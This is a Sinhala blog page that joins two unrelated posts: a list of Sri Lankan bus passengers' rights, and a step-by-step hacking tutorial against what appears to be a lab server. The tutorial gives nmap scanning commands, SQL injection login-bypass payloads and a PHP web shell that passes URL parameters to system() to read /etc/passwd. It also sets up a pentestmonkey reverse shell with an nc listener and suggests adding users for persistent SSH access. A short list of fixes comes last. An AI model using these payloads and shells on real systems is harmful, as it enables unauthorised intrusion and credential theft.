September 2018
best sinhala blog in sri lanka

මේක නම් ඕනි වෙයි කියල දැම්මේ Facebook එකේ ඉන්නකොට තමා හම්බුනේ


* බස් නැවතුම්පළින් බස් රථය පිටත් වීමට පෙර ප්‍රවේශ පත්‍රයක් ලබා ගැනීමට ඔබට අයිතිවාසිකමක් ඇත.

* රථයට ගොඩ වූ ස්ථානය හා බැස යන ස්ථානය, නියමිත බස් ගාස්තුව, දිනය, බස් රථ අංකය පැහැදිලිව සඳහන් විධිමත් ප්‍රවේශ පත්‍රයක් ඔබට ලබා ගත හැකි විය යුතුය.

* ගෙවනු ලැබූ ගාස්තුවට අදාළව ගමනාන්තය දක්වා ආරක්ෂාකාරීව බස් රථයේ ගමන් ගැනීමට හැකි විය යුතුය.

* විධිමත් හා නියමිත ඇඳුමකින් සැරසුණු විනීත හා ආචාරශීලී ඇවතුම් පැවතුම්වලින් යුතු රියදුරු හා කොන්දොස්තරවරයකුගේ සේවය ඔබට ලබා ගත හැකි විය යුතුය.

* සාමාන්‍ය සේවා බස් රථයක නම් වයස අවුරුදු 3 ට වැඩි 12 ට අඩු දරුවන් සඳහා නියමිත ගාස්තුවෙන් අඩක් (භාග ටිකට්පතක්) ගෙවා බස් රථයේ ගමන් ගැනීමට හැකියාව ඇත.

* සුඛෝපභෝගී බස් රථයක දී ඔබට, ප්‍රමාණවත් වායු සමීකරණ තත්ත්වයක් ලැබීමට හා අනුමත ආසන ගණනට වැඩි නොවන මගීන් සංඛ්‍යාවක් ප්‍රවාහනය කරනු ලබන පහසුවෙන් ගමන් කළ හැකි සේවාවක් ලැබීමට අයිතියක් ඇත.

* පොදු ප්‍රවාහන සේවා බස් රථය නීත්‍යනුකූලවම දුම්බීම තහනම් කලාපයකි. එබැවින් දුම්වැටි දුමෙන් තොර පරිසරයක ගමන් කිරීමට මගීන් වන ඔබට අයිතියක් ඇත.

* බස් රථය නොසැලකිලිමත් ලෙස හා අධික වේගයෙන් හෝ අනතුරුදායක ලෙස හෝ මාර්ග නීති උල්ලංඝනය කරමින් පදවන්නේ නම් එයට විරුද්ධ වීමට ඔබට අයිතියක් ඇත.

* බස් රථය ධාවනය අතරතුරදී රියදුරු ජංගම දුරකථනයෙන් සංවාදවල යෙදෙන්නේ නම් එයට විරුද්ධ වීමටද ඔබට අයිතියක් ඇත.

* ගුවන් විදුලි යන්ත්‍රය හැර වෙනත් ශ්‍රව්‍ය දෘශ්‍ය උපකරණයක් භාවිතා නොකරනු ලබන බස් සේවාවක් ලැබීමට මෙන්ම ගුවන් විදුලි යන්ත්‍රය වුවද ශබ්දය (උපරිම ශබ්ද මට්ටම ඩෙසිබල් 80) අවහිරයක් නොවන ලෙස පාවිච්චි කරනු ලබන බස් රථයක ගමන් ගැනීමට මගී ඔබට අයිතියක් ඇත.

* ගාස්තු ගෙවන මගියා බස් රථයේ වැදගත්ම පුද්ගලයා වන බැවින් ඒ සඳහා වන ගෞරවය හා සැලකිල්ල ලැබීමට ඔබට අයිතියක් ඇත

* මත්පැන් හෝ මත්ද්‍රව්‍ය භාවිතයෙන් තොර බස් සේවක කණ්ඩායම්වල සේවය ඔබට ලබා ගැනීමට අයිතියක් ඇත.

* බස් රථය නියමිත වේලාවට ගමන් ඇරඹනු ලබන බවට හා ගමන නියමිත වේලාවට නිමා කරනු ලබන බවට ඔබට තහවුරු විය යුතුය. ගමන් ඇරඹීමට නියමිත වේලාව හා ගමන නිම කිරීමට නියමිත වේලාව බස් රථයේ ප්‍රදර්ශනය කරනු ලැබීමට බස් රථයේ රියදුරු කොන්දොස්තර මහතා හෝ අයිතිකරු විසින් කටයුතු කරනු ලැබිය යුතුය.

>> අන්තර් පළාත් ධාවනය සඳහා අවසර ලත් බස් රථ විසින් මඟීන් වෙත සැපයීමට එකඟ වී ඇති කොන්දේසි

SLTB-bus-highway1

* බස් රථය විසින් ඒ තුළ ගමන් ගන්නා මගීන් සහ තුන්වන පාර්ශ්වය (පදිකයන්, අනෙකුත් වාහන හා දේපළ) සඳහා අසීමිත වගකීමක් යටතේ රක්ෂණ සහතිකයක් ලබා ගෙන තිබිය යුතුය.

* බස් රථය තුළ ගිනි නිවීමේ උපකරණයක් සවි කොට තිබිය යුතුය.

* මගීන් සහිතව සේවාවේ ධාවනය කරමින් පවතින අතරතුරදී අතරමග ඉන්ධන පිරවුම්හල්වලින් බස් රථයට ඉන්ධන යෙදීම නොකළ යුතුය.

* බස් සේවක කණ්ඩායම වැදගත් හැසිරීමකින් මෙන්ම විධිමත් ඇඳුමකින් සැරසී සේවයේ යෙදිය යුතු අතර ඔහු හෝ ඇය තමාගේ සේවය පිළිබඳව මනා පුහුණුවක් ලැබූ අයෙකු මෙන්ම ජාතික ගමනාගමන කොමිෂන් සභාවේ ලියාපදිංචි වූ අයෙකු බවට නිකුත් කරනු ලැබූ හැඳුනුම්පත්‍ර සේවයේ යෙදී සිටින විට පැළඳ සිටිය යුතුය.

* බස් රථය ගමනාරම්භයේදීම බස් නැවතුම්පොළින් පිටත් වීමට පෙර බස් රථයේ සිටින සියලුම මගීන්ට ප්‍රවේශපත්‍ර නිකුත් කළ යුතු අතර අතරමගදී බස් රථයට ඇතුළු වන සියලුම මගීන්ට ඒ අවස්ථාවේදීම ප්‍රවේශපත්‍ර නිකුත් කළ යුතුය. ඒ සඳහා ප්‍රවේශපත්‍ර නිකුත් කිරීමේ විද්‍යුත් යන්ත්‍ර භාවිතා කළ යුතුය.

* අර්ධ සුඛෝපභෝගී සහ සුඛෝපභෝගී සේවා බස් රථවල ආසනගත මගීන් පමණක් ප්‍රවාහනය කළ යුතු අතර සිටගෙන මගීන් ප්‍රවාහනය තහනම් වේ.

* බස් රථයේ ගමන් ගන්නා මගීන්ට දැන ගැනීම පිණිස බස් ගාස්තු සටහන, බස් රථය ගමන් ආරම්භ කරන වේලාව, ගමනාන්තයට ළඟා වන වේලාව, රියදුරු සහ කොන්දොස්තරගේ ලියාපදිංචි අංක, බස් රථයේ අංකය බස් රථය තුළ ප්‍රදර්ශනය කළ යුතුය.

* බස්රථය තුළ ක්‍රියාත්මක වන ඔරලෝසුවක් තිබිය යුතුය.

බස් රථය ඇතුළත විදුලි පරිපථ මගින් කෙරෙන සැරසිලි හා වෙනත් සැරසිලි ද නොකළ යුතුය.

උපුටා ගැනීම – සමබිම
best sinhala blog in sri lanka
ඔව් ඉතින් පින්වතුනි අද කියන්න හදන්නේ කවුරුත් දන්නා nmap වලින් කොහොමද lan එක scan කරලා ඒකෙ සර්වර් එකකට ඇතුල් වෙන විදිහ


සෙටප් එක ගැන කිව්වෝත් මේකේ කාලි මැෂින් එකයි web for penterster කියල සර්වර් එකකුයි තියෙන්නේ

හරි මුලින්ම මන් ගන්නේ මේකට කාලි ලිනක්ස් එකක්

එකේ terminal එක open කරලා nmap කියල ගහල enter කරන්න

nmap 


එතකොට මේ වගේ හැඳින්වීමක් දෙයි ඔයාලට



දැන් ip addr කියන කමාන්ඩ් එක ගහල අපේ ලෝකල් ip එක බලමු
ip addr


හරි මේ තියෙන්නේ මගේ ලෝකල් ip එක


දැන් අපි බලමු කොහොමද lan එක scan කරන්නේ කියලා
nmap -v -sn 192.168.10.100-150


ඕක ගහල enter කරන්න


 දැන් scan වෙයි


දැන් මෙහෙම එයි



හරි ඔය උඩ තියෙන්නේ අපි scan කරපු එකේ report එක මොනාද on එකේ සහ මොනාද නැත්තේ කියල


දැන් බලමු මොනාද banner එලියට දෙන්නේ කියලා

ඒ කියන්නේ ඔය service එකක් එහෙම රන් වෙනවා නම් එකේ header එක එහෙම පෙන්නන්නේ ඒවා අල්ලන එක තමා මේ




මේ එකේ output එක



මේ තියෙන්නේ ip range එකක තියන පොර්ට් 65536 ම scan කරන කමාන්ඩ් එක
මේක තමා වටින්නේ
nmap -p- 192.168.1.100-150


මේ තියෙන්නේ එක රන් කළාම



හරි මන් දැක්ක දැන් මේකේ ssh පොර්ට් එක open එකේ තියනවා ඉතින් මන් බලනවා මොඅක්ද මේ සර්වර් එක කියලා
ssh 192.168.10.104


ඔන්න මේකේ බැනර් එකක් තියනව
මන් දන්නවා මේක දැන් මොකක් හරි වටිනා සර්වර් එකක් කියලා හැබැයි මන් මේකේ username වත් පාස්වර්ඩ් වත් දන්නේ නෑ



දැන් මන් කරන්න හදන්නේ මේකේ os එක මොකක්ද කියල බලන්න
nmap -O 192.168.10.104


ඔන්න දැන් පේනවා මේකේ විස්තර ටිකක් මොකක්ද os එක සර්විස් මොනාද mac එක මොකක්ද වගේ දේවල් ටිකක්

දැන් බලන්නේ මේකේ http නොහොත් web සර්විස් මොනාද එලියට දීලා තියෙන්නේ කියලා සහ web සර්විස් වල තියන අඩුපාඩු මොනාද කියලා
nmap --script=http-enum 192.168.10.104


මේ තියෙන්නේ තියන සර්විස් සහ ඒවගේ අඩුපාඩු



හරිනේ වැඩේ ආතල් වගේ

දැන් මන් බලනවා මොනාද මේකේ තියන සර්විස් වල version ටික කියල


nmap -sV --version-all 192.168.10.104
nmap -sV --version-intensity 5 192.168.10.104

 ඔය දෙකම පාවිච්චි කරන්න පුළුවන්



ඔයාලට පේනවා ඇති මේ සර්විස් වල version එක බලාගන්න පුළුවන්
මේකේ තියන වටිනාකම තමා මේවගේ පරණ version වල එක එක අවුල් ආව අපිට තියෙන්නේ ඒවා හොයාගෙන ගේම දෙන්න




හරිනේ දැන් මන් browser එක open කරලා මේකේ ip එක ගහනවා web එක ලෝඩ් කරන්න




දැන් පලවෙනි ලින්ක් එකට ගිහින් බලනව මොනාද කරන්න පුළුවන් කියල


හරි දැන් පොඩි sql injection එකක් දීල බලමු


  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--

 එකක් දෙකක් ගහල බලන්න වැඩ කරයි


හරි දැන් මන් php එකක් අප්ලෝඩ් කරලා සර්වර් එකේ /etc/passwd ෆයිල් එක read කරන්න හදන්නේ
වැඩේට php ෆයිල් එකක් හදාගන්න මේ කෝඩ් එක දාල


<?php

echo system ($_GET ["val1"].' '.$_GET ["val2"] );


?>
දැන් එක අප්ලෝඩ් කරලා click කරන්න තියෙන්නේ

ඊටපස්සේ url එකේ මේක ගහන්න

http://192.168.10.104/upload/images/simple.php?val1=cat&val2=/etc/passwd

වැඩේ පොඩ්ඩක් ගලපලා ගහන්න
 හරි නම් සර්වර් එකේ පාස්වර්ඩ් file එක පෙන්නයි



දැන් බලමු shell එකක් php වලින් open කරගන්න විදිහ

මේක ගන්න php file එකකට

මේක අරන් මේකේ php-reverse-shell.php එක එඩිට් කරගන්න තමන්ගේ ip සහ පොර්ට් දාල
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
දැන් ඔකේ අදාළ තැන් වලට ip පොර්ට් එහෙම දීලා save කරලා ඉන්න




දැන් මේ වගේ file අප්ලෝඩ් කරන්න තියන තැනකට ගිහින් අප්ලෝඩ් කරන්න




දැන් කාලි එකේ
nc -nvlp 1234

 කියල ගහල listener එකක් දාගන්න

දැන් අරක අප්ලෝඩ් කරලා රන් කරන්න

වැඩේ හරි නම් මේ වගේ shell එකක් open වෙයි ඔයාගේ machine එකේ

මේ තියෙන්නේ සර්වර් එකේ shell එක



දැන් ඔයාට permission තියනවා නම් කෙලින්ම පුළුවන් user කෙනෙක් add කරලා පාස්වර්ඩ් එකක් දාල එකෙන් ssh වලින් ලොග් වෙන්න නැත්තම් තියන ලොගින් එකක පාස්වර්ඩ් වෙනස් කරලා ssh වලින් ලොග් වෙලා ඕනි දෙයක් කරන්න



Vulnerability අවුල් තැන්

Recommendations to fix weaknesses
❖ SQL injection
• Using of Prepared Statements
• Using Parameterized Queries
• Using of Stored Procedures
• White List Input Validation
• Escaping All User Supplied Input
• Enforcing Least Privilege
• Performing White List Input Validation as a Secondary Defense
❖ File Upload Vulnerability
• Use validated file extensions.
• Limiting upload facility registered users.
• Check the file from the internet for content. Make sure it is the file type we are accepting. • Use other file hosting site to accept files (google drive, MediaFire).
• Restricting users to file storing location.
• Add some random value to file when it storing.
❖ Reverse Shells
• Install good firewall.